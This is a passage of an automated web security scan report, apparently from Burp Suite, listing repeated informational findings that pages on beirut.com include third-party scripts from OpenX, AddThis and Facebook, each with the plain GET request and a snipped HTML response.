HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:40:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.618. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Weather-Environment/8954751592

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Weather-Environment/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.619. http://www.beirut.com/Recreations/Amusement-Centers/478536232 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Amusement-Centers/478536232

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Amusement-Centers/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.620. http://www.beirut.com/Recreations/Arcade-Centers/707176335 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Arcade-Centers/707176335

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Arcade-Centers/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.621. http://www.beirut.com/Recreations/Beach-Clubs/67326046 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Beach-Clubs/67326046

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Beach-Clubs/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.622. http://www.beirut.com/Recreations/Bowling-Centers/93987864 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Bowling-Centers/93987864

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Bowling-Centers/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:35:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.623. http://www.beirut.com/Recreations/Golf-Clubs/926389688 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Golf-Clubs/926389688

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Golf-Clubs/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.624. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Horseback-Riding/6888394074

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Horseback-Riding/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.625. http://www.beirut.com/Recreations/Play-Centers/83897013 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Play-Centers/83897013

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Play-Centers/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:37:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.626. http://www.beirut.com/Recreations/Pool-Halls/2561106634 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Pool-Halls/2561106634

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Pool-Halls/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:39:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.627. http://www.beirut.com/Recreations/Public-Beaches/075078389 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Public-Beaches/075078389

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Public-Beaches/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:43:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.628. http://www.beirut.com/Recreations/Theme-Parks/4635732484 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Theme-Parks/4635732484

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Theme-Parks/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:46:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.629. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Yacht-Clubs/6501142

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Yacht-Clubs/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:47:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
